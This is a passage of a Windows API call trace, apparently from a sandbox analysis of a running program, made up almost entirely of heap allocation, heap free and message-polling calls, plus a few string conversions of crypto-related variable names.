dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0249.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0249.015] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0249.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0249.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0249.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0249.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0249.016] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0249.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0249.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0249.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0249.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0249.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0249.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0249.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0249.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0249.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0249.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0249.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0249.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0249.016] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0249.016] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0249.016] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0249.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0249.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0249.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516e8 [0249.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0249.017] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0249.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0249.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0249.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0249.017] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0249.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0249.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0249.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51808 [0249.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0249.017] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0249.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0249.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0249.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0249.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0249.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0249.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0249.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0249.017] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0249.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0249.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0249.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0249.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0249.018] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0249.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0249.018] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0249.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0249.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0249.018] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0249.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0249.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0249.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51760 [0249.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0249.018] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0249.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0249.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0249.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0249.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0249.018] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0249.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0249.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0249.018] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0249.018] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0249.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0249.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0249.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0249.018] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0249.019] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0249.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0249.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0249.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0249.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0249.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0249.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0249.019] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0249.019] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0249.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0249.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0249.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0249.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0249.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0249.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0249.019] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0249.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0249.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0249.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51658 [0249.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0249.019] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0249.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0249.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0249.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0249.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0249.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0249.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0249.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0249.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0249.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0249.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0249.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0249.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0249.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0249.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0249.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0249.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0249.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0249.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0249.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0249.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0249.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0249.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0249.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0249.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0249.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0249.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0249.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0249.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0249.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0249.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0249.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0249.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0249.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0249.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0249.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0249.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0249.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0249.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0249.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0249.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0249.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0249.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0249.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0249.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0249.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0249.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0249.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0249.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0249.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0249.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0249.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0249.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0249.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0249.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0249.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0249.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0249.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0249.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0249.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0249.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0249.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0249.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0249.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0249.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0249.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1f8) returned 0x3bf0050 [0249.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0249.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0050 | out: hHeap=0x970000) returned 1 [0249.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0249.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0249.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0249.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0249.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0249.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0249.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0249.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0249.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e558d8 [0249.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0249.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0249.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0249.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0249.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0249.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0249.022] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0249.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0249.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0249.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0249.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0249.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0249.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0249.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0249.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0249.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0249.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0249.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0249.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0249.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0249.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0249.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0249.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0249.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0249.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0249.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0249.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0249.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0249.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0249.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0249.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0249.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0249.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0249.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0249.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0249.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0249.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0249.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0249.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0249.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0249.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0249.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0249.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0249.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0249.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0249.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0249.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0249.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0249.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0249.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0249.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0249.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0249.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0249.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0249.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0249.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0249.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0249.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0249.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0249.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0249.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0249.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0249.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0249.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0249.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0249.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0249.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0249.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0249.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0249.025] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: 